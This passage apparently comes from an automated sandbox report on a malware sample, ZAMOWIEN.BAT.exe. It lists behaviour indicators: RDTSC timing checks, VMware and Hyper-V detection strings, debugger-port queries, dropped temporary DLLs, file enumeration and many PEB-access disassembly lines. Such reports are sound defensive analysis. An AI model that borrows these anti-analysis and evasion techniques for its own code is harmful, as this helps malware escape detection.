            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeRDTSC instruction interceptor: First address: 54C4B9E second address: 54C4B9E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7EE8FF7603h 0x00000006 test ah, ch 0x00000008 inc ebp 0x00000009 jmp 00007F7EE8FF7672h 0x0000000b cmp cl, 00000018h 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeRDTSC instruction interceptor: First address: 1D44B9E second address: 1D44B9E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7EE9075BE3h 0x00000006 test ah, ch 0x00000008 inc ebp 0x00000009 jmp 00007F7EE9075C52h 0x0000000b cmp cl, 00000018h 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D1C0 rdtsc 4_2_3286D1C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\sdchange.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_004069E5 FindFirstFileW,FindClose,0_2_004069E5
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00405D94 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D94
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030CC980 FindFirstFileW,FindNextFileW,FindClose,6_2_030CC980
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: ZAMOWIEN.BAT.exe, 00000000.00000002.2061447510.00000000009B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\&
            Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2330006530.000000000289C000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2427235202.000000000289C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: sdchange.exe, 00000006.00000002.2884931299.0000000003377000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000002.2885100721.0000000000770000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2738306534.000001BC8EB7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-2895
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-2664
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D1C0 rdtsc 4_2_3286D1C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_0040364B EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040364B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_6E351BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E351BFF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C5283 mov eax, dword ptr fs:[00000030h]4_2_328C5283
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282329E mov eax, dword ptr fs:[00000030h]4_2_3282329E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282329E mov eax, dword ptr fs:[00000030h]4_2_3282329E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]4_2_328052A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]4_2_328052A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]4_2_328052A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]4_2_328052A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328872A0 mov eax, dword ptr fs:[00000030h]4_2_328872A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328872A0 mov eax, dword ptr fs:[00000030h]4_2_328872A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]4_2_328B92A6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]4_2_328B92A6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]4_2_328B92A6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]4_2_328B92A6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328792BC mov eax, dword ptr fs:[00000030h]4_2_328792BC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328792BC mov eax, dword ptr fs:[00000030h]4_2_328792BC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328792BC mov ecx, dword ptr fs:[00000030h]4_2_328792BC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328792BC mov ecx, dword ptr fs:[00000030h]4_2_328792BC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9240 mov eax, dword ptr fs:[00000030h]4_2_327E9240
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9240 mov eax, dword ptr fs:[00000030h]4_2_327E9240
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]4_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]4_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]4_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]4_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]4_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]4_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]4_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F2D0 mov eax, dword ptr fs:[00000030h]4_2_3281F2D0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F2D0 mov eax, dword ptr fs:[00000030h]4_2_3281F2D0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C52E2 mov eax, dword ptr fs:[00000030h]4_2_328C52E2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF2F8 mov eax, dword ptr fs:[00000030h]4_2_328AF2F8
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B2F0 mov eax, dword ptr fs:[00000030h]4_2_3289B2F0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B2F0 mov eax, dword ptr fs:[00000030h]4_2_3289B2F0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E92FF mov eax, dword ptr fs:[00000030h]4_2_327E92FF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32827208 mov eax, dword ptr fs:[00000030h]4_2_32827208
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32827208 mov eax, dword ptr fs:[00000030h]4_2_32827208
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C5227 mov eax, dword ptr fs:[00000030h]4_2_328C5227
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB2D3 mov eax, dword ptr fs:[00000030h]4_2_327EB2D3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB2D3 mov eax, dword ptr fs:[00000030h]4_2_327EB2D3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EB2D3 mov eax, dword ptr fs:[00000030h]4_2_327EB2D3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F92C5 mov eax, dword ptr fs:[00000030h]4_2_327F92C5
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F92C5 mov eax, dword ptr fs:[00000030h]4_2_327F92C5
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282724D mov eax, dword ptr fs:[00000030h]4_2_3282724D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AB256 mov eax, dword ptr fs:[00000030h]4_2_328AB256
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AB256 mov eax, dword ptr fs:[00000030h]4_2_328AB256
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BD26B mov eax, dword ptr fs:[00000030h]4_2_328BD26B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BD26B mov eax, dword ptr fs:[00000030h]4_2_328BD26B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32831270 mov eax, dword ptr fs:[00000030h]4_2_32831270
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32831270 mov eax, dword ptr fs:[00000030h]4_2_32831270
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32819274 mov eax, dword ptr fs:[00000030h]4_2_32819274
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F7370 mov eax, dword ptr fs:[00000030h]4_2_327F7370
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F7370 mov eax, dword ptr fs:[00000030h]4_2_327F7370
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F7370 mov eax, dword ptr fs:[00000030h]4_2_327F7370
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C539D mov eax, dword ptr fs:[00000030h]4_2_328C539D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3284739A mov eax, dword ptr fs:[00000030h]4_2_3284739A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3284739A mov eax, dword ptr fs:[00000030h]4_2_3284739A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328233A0 mov eax, dword ptr fs:[00000030h]4_2_328233A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328233A0 mov eax, dword ptr fs:[00000030h]4_2_328233A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328133A5 mov eax, dword ptr fs:[00000030h]4_2_328133A5
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9353 mov eax, dword ptr fs:[00000030h]4_2_327E9353
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9353 mov eax, dword ptr fs:[00000030h]4_2_327E9353
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328913B9 mov eax, dword ptr fs:[00000030h]4_2_328913B9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328913B9 mov eax, dword ptr fs:[00000030h]4_2_328913B9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328913B9 mov eax, dword ptr fs:[00000030h]4_2_328913B9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327ED34C mov eax, dword ptr fs:[00000030h]4_2_327ED34C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327ED34C mov eax, dword ptr fs:[00000030h]4_2_327ED34C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E7330 mov eax, dword ptr fs:[00000030h]4_2_327E7330
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AB3D0 mov ecx, dword ptr fs:[00000030h]4_2_328AB3D0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF3E6 mov eax, dword ptr fs:[00000030h]4_2_328AF3E6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C53FC mov eax, dword ptr fs:[00000030h]4_2_328C53FC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287930B mov eax, dword ptr fs:[00000030h]4_2_3287930B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287930B mov eax, dword ptr fs:[00000030h]4_2_3287930B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287930B mov eax, dword ptr fs:[00000030h]4_2_3287930B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B132D mov eax, dword ptr fs:[00000030h]4_2_328B132D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B132D mov eax, dword ptr fs:[00000030h]4_2_328B132D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F32A mov eax, dword ptr fs:[00000030h]4_2_3281F32A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C5341 mov eax, dword ptr fs:[00000030h]4_2_328C5341
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF367 mov eax, dword ptr fs:[00000030h]4_2_328AF367
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32893370 mov eax, dword ptr fs:[00000030h]4_2_32893370
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287D080 mov eax, dword ptr fs:[00000030h]4_2_3287D080
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287D080 mov eax, dword ptr fs:[00000030h]4_2_3287D080
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281D090 mov eax, dword ptr fs:[00000030h]4_2_3281D090
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281D090 mov eax, dword ptr fs:[00000030h]4_2_3281D090
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282909C mov eax, dword ptr fs:[00000030h]4_2_3282909C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]4_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D0C0 mov eax, dword ptr fs:[00000030h]4_2_3286D0C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D0C0 mov eax, dword ptr fs:[00000030h]4_2_3286D0C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C50D9 mov eax, dword ptr fs:[00000030h]4_2_328C50D9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328190DB mov eax, dword ptr fs:[00000030h]4_2_328190DB
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328150E4 mov eax, dword ptr fs:[00000030h]4_2_328150E4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328150E4 mov ecx, dword ptr fs:[00000030h]4_2_328150E4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]4_2_328B903E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]4_2_328B903E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]4_2_328B903E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]4_2_328B903E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B052 mov eax, dword ptr fs:[00000030h]4_2_3281B052
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289705E mov ebx, dword ptr fs:[00000030h]4_2_3289705E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289705E mov eax, dword ptr fs:[00000030h]4_2_3289705E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F5096 mov eax, dword ptr fs:[00000030h]4_2_327F5096
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287106E mov eax, dword ptr fs:[00000030h]4_2_3287106E
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C5060 mov eax, dword ptr fs:[00000030h]4_2_328C5060
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov ecx, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]4_2_32801070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327ED08D mov eax, dword ptr fs:[00000030h]4_2_327ED08D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D070 mov ecx, dword ptr fs:[00000030h]4_2_3286D070
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A5180 mov eax, dword ptr fs:[00000030h]4_2_328A5180
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A5180 mov eax, dword ptr fs:[00000030h]4_2_328A5180
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]4_2_327EF172
